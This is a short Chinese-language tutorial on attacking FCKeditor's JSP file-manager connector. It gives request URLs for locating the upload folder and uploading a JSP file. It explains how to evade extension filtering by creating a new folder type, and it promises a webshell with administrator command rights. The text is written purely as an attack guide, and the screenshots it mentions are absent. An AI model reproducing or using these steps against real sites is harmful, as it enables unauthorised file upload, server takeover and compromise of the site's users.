Fckeditor jsp版漏洞利用方法：__js

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

用這個地址尋找上傳圖片的路徑，存在漏洞的話應該返回一個xml檔案，如圖

注意紅框的地方，是上傳後圖片存放的地址。

然後用

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

這個地址上傳jsp檔案，如果網站對上傳檔案的尾碼作了限制，那麼就建立一個名字為new的檔案夾，修改上面url中的Type=Image為Type=new，把檔案上傳到這個檔案夾，這個檔案夾一般就不會對檔案尾碼作限制了。如圖：

如果一切正常的話，利用這個Fckeditor 的漏洞所獲得的jsp webshell應該有cmd管理員權限